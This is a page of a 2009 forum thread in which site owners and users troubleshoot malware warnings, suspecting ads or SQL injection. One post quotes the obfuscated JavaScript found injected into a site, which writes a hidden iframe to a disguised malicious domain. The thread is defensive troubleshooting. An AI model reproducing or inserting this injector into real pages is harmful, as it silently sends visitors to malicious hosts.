Thanks for the help though.
Suspected Malware attempt when using Safari
Moderators: chamber715, joerules
39 posts
• Page 2 of 3 • 1, 2, 3
by joerules » Mon May 25, 2009 4:23 pm
This is good. I've added both openstat.ws and trafing.net to the Competitive Ad Filter. they say it could take a couple hours to kick in. Hopefully it's nothing more serious.
Thanks for the help though.
Thanks for the help though.
-
joerules - Posts: 19126
- Joined: Tue Nov 19, 2002 12:43 am
- Location: NYC
by logosmonkey » Mon May 25, 2009 6:18 pm
You might also want to ad google-adservice.com, it's another one mentioned in the forums referenced off that last link. I don't think it's one affecting you but it wouldn't hurt.
-
logosmonkey - Posts: 1904
- Joined: Sat Feb 17, 2007 11:17 pm
- Location: Arkansas
by chamber715 » Mon May 25, 2009 9:33 pm
Is anyone still having trouble with the site? I was able to find a piece of code that was causing the problem. I just don't know if I got all of it. If you guys are still seeing the warnings, let me know and I'll do another search.
If you're stupid, surround yourself with smart people. If you're smart, surround yourself with smart people who disagree with you.
- chamber715
- Posts: 12498
- Joined: Thu Nov 14, 2002 1:20 pm
by Silv3r » Mon May 25, 2009 9:54 pm
I got another warning when I came to the site about 10 minutes ago. If it happens again I'll write down the details and post them up.
If you're looking in a signature for some astonishing insight into the way things are, keep on lookin'.
-
Silv3r - Posts: 1347
- Joined: Tue Sep 19, 2006 4:45 am
- Location: Australia
by Liliplanet » Tue May 26, 2009 4:40 am
Hi, yes I still have the problem. What I've done is to disable javascript on my site, and that seems to work.
Please, what is the code you found that is causing this? Is it Googe Adsense?
Thank you for your reply.
Please, what is the code you found that is causing this? Is it Googe Adsense?
Thank you for your reply.
- Liliplanet
- Posts: 3
- Joined: Mon May 25, 2009 6:22 am
by Silv3r » Wed May 27, 2009 3:41 am
Just got it again through Chrome, both it and Avast notified me this time, whereas previously its just been avast.
Says its linking to malicious site openstat.ws
Says its linking to malicious site openstat.ws
If you're looking in a signature for some astonishing insight into the way things are, keep on lookin'.
-
Silv3r - Posts: 1347
- Joined: Tue Sep 19, 2006 4:45 am
- Location: Australia
by Liliplanet » Wed May 27, 2009 6:36 am
Yes, I have it again as well. After removing any javascript on my site. Do you think it's only related to adsense?
This is the code that gets inserted:
script type="text/javascript">
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
script
This is the code that gets inserted:
script type="text/javascript">
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
script
- Liliplanet
- Posts: 3
- Joined: Mon May 25, 2009 6:22 am
by Tom Brazelton » Wed Jun 10, 2009 10:24 pm
I've been having the exact same problem over the last few days. Me and my site admin combed the site for code and couldn't find anything.
We're thinking it has to be one of the ads that's causing it, but can't figure out which one.
We're thinking it has to be one of the ads that's causing it, but can't figure out which one.
[url=http://tinyurl.com/6nao3v]THEATER HOPPER -::- Comics about movies.
[/url]
[/url]
-
Tom Brazelton - Posts: 5358
- Joined: Sun Nov 13, 2005 1:03 pm
- Location: West Des Moines, Iowa
by logosmonkey » Thu Jun 11, 2009 8:53 am
If it's happening on the boards it could feasibly be a SQL injection attack. Especially if you end up finding the code on your pages later. See http://www.governmentsecurity.org/forum ... topic=4209 or http://www.google.com/search?q=phpbb+sq ... =firefox-a
2.0.8 and earlier version are susceptible to different types.
But I still think it's something to do with your ads because I never see them, but I adblock all your ads (sorry!)
2.0.8 and earlier version are susceptible to different types.
But I still think it's something to do with your ads because I never see them, but I adblock all your ads (sorry!)
-
logosmonkey - Posts: 1904
- Joined: Sat Feb 17, 2007 11:17 pm
- Location: Arkansas
by Tom Brazelton » Thu Jun 11, 2009 11:13 pm
I don't think it matters.
If Safari or Chrome has identified the URL as dangerous, anything that comes after ".com/" is suspect.
If Safari or Chrome has identified the URL as dangerous, anything that comes after ".com/" is suspect.
[url=http://tinyurl.com/6nao3v]THEATER HOPPER -::- Comics about movies.
[/url]
[/url]
-
Tom Brazelton - Posts: 5358
- Joined: Sun Nov 13, 2005 1:03 pm
- Location: West Des Moines, Iowa
39 posts
• Page 2 of 3 • 1, 2, 3
Return to Site Suggestions Board
Who is online
Users browsing this forum: bvvddffg and 0 guests